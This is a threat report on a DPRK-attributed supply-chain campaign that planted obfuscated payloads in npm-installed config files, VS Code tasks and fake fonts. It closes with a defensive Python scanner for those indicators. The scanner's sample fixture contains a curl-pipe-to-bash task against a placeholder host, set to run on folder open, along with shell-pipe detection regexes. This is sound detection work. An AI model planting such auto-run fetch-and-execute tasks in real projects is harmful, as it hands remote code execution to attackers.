A supply chain campaign attributed to a DPRK-linked threat actor, PolinRider, has resulted in the compromise of over 1,900 GitHub repositories through malicious npm packages, VS Code artifacts, and injected JavaScript payloads. The campaign leverages stealthy code injection and blockchain-based command-and-control (C2) infrastructure to achieve persistent access, remote code execution, and credential theft across developer environments and downstream projects.
The infection primarily originates from malicious npm packages and potentially compromised developer tooling, which execute during install or build phases. These packages inject heavily obfuscated JavaScript payloads into legitimate project configuration files (e.g., postcss.config.mjs, tailwind.config.js) by appending malicious code after valid content, making detection difficult. Additional infection vectors include malicious .vscode/tasks.json files executing curl | bash, weaponized take-home coding templates, and even payloads hidden within .woff2 font files.
Once executed, the malware deploys a multi-stage payload that includes a backdoor and infostealer, culminating in the delivery of a Beavertail variant. The payload retrieves encrypted second-stage code from blockchain networks (TRON, Aptos, BSC), decrypts it using XOR keys, and executes it via eval(), enabling remote code execution and persistence through detached processes. The campaign also includes a propagation mechanism (temp_auto_push.bat) that rewrites Git commit history to hide malicious changes and force-push them to remote repositories, facilitating further spread.
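As an added defensive example (not code from the original report or from any project it names), the Python scanner below looks for the file-level indicators described in the two paragraphs above: obfuscated code appended to postcss.config.mjs or tailwind.config.js (eval() calls, dense hex/unicode escapes, abnormally long lines), a .vscode/tasks.json task that pipes curl or wget into a shell, a .woff2 file that is not actually a font, and the temp_auto_push.bat propagation script. The detection thresholds, the sample repository it builds, and the example.invalid host are constructed for this example; the check for tasks marked to run on folder open uses a VS Code tasks feature that the text itself does not mention.

```python
"""Scan a checkout for the indicators described in the report (constructed example)."""
import json
import re
import tempfile
from pathlib import Path

# Configuration files the campaign is reported to append payloads to.
TARGET_CONFIGS = {"postcss.config.mjs", "tailwind.config.js"}

# Heuristics for appended, obfuscated JavaScript. Thresholds are assumptions.
EVAL_CALL = re.compile(r"\beval\s*\(")
ESCAPE = re.compile(r"\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}")
LONG_LINE = 500      # characters on a single line
ESCAPE_MIN = 8       # hex/unicode escapes on a single line

# A remote fetch piped straight into a shell, as in the tasks.json vector.
CURL_PIPE = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z|)sh\b")

WOFF2_MAGIC = b"wOF2"  # every real WOFF2 font starts with this signature


def score_js(text):
    """Return a list of findings for one JavaScript config file."""
    findings = []
    if EVAL_CALL.search(text):
        findings.append("eval() call")
    for lineno, line in enumerate(text.splitlines(), 1):
        if len(line) > LONG_LINE:
            findings.append(f"line {lineno}: {len(line)} chars on one line")
        if len(ESCAPE.findall(line)) >= ESCAPE_MIN:
            findings.append(f"line {lineno}: heavy hex/unicode escapes")
    return findings


def scan_tasks_json(text):
    """Flag VS Code tasks that pipe a download into a shell or auto-run on open."""
    try:
        tasks = json.loads(text).get("tasks", [])
    except (json.JSONDecodeError, AttributeError):
        # tasks.json may contain comments (JSONC); fall back to a raw text scan.
        return ["remote fetch piped to shell"] if CURL_PIPE.search(text) else []
    findings = []
    for task in tasks:
        label = task.get("label", "?")
        cmd = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
        if CURL_PIPE.search(cmd):
            findings.append(f"task {label!r}: remote fetch piped to shell")
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            findings.append(f"task {label!r}: runs automatically on folder open")
    return findings


def check_font(data):
    """A .woff2 file without the WOFF2 magic is carrying something else."""
    return [] if data[:4] == WOFF2_MAGIC else ["missing wOF2 magic"]


def scan_repo(root):
    """Walk a checkout and return {posix relative path: [findings]}."""
    root = Path(root)
    report = {}
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        if path.name in TARGET_CONFIGS:
            findings = score_js(path.read_text(errors="replace"))
        elif path.name == "tasks.json" and path.parent.name == ".vscode":
            findings = scan_tasks_json(path.read_text(errors="replace"))
        elif path.suffix == ".woff2":
            findings = check_font(path.read_bytes())
        elif path.name == "temp_auto_push.bat":
            findings = ["propagation script named in the report"]
        else:
            continue
        if findings:
            report[path.relative_to(root).as_posix()] = findings
    return report


# Constructed sample files: a clean Tailwind config, a stand-in for an appended
# payload (harmless), a tasks.json using the curl | bash pattern, and two fonts.
BENIGN_CONFIG = 'export default {\n  content: ["./src/**/*.{js,ts,jsx,tsx}"],\n  theme: { extend: {} },\n  plugins: [],\n};\n'
APPENDED_PAYLOAD = "\n" + r';(function(){var k="\x65\x76\x61\x6c\x28\x61\x74\x6f";eval(k)})();' + "\n"
TASKS_JSON = json.dumps({"version": "2.0.0", "tasks": [{
    "label": "build", "type": "shell",
    "command": "curl -fsSL https://example.invalid/setup.sh | bash",
    "runOptions": {"runOn": "folderOpen"}}]})


def build_sample_repo():
    """Create a throwaway checkout containing the constructed files above."""
    root = Path(tempfile.mkdtemp(prefix="scan-demo-"))
    for sub in ("clean", "tampered", ".vscode", "fonts"):
        (root / sub).mkdir()
    (root / "clean" / "tailwind.config.js").write_text(BENIGN_CONFIG)
    (root / "tampered" / "tailwind.config.js").write_text(BENIGN_CONFIG + APPENDED_PAYLOAD)
    (root / ".vscode" / "tasks.json").write_text(TASKS_JSON)
    (root / "fonts" / "real.woff2").write_bytes(WOFF2_MAGIC + bytes(28))
    (root / "fonts" / "fake.woff2").write_bytes(b"var p=1;")
    (root / "temp_auto_push.bat").write_text("@echo off\r\n")
    return root


if __name__ == "__main__":
    for rel, hits in sorted(scan_repo(build_sample_repo()).items()):
        print(rel, "->", "; ".join(hits))
```

Because the payload is appended after valid content, the strongest check in practice is a diff of these config files against the last reviewed commit rather than the heuristics alone; the scanner above is meant for a quick triage pass over a checkout or a CI workspace before install and build steps run.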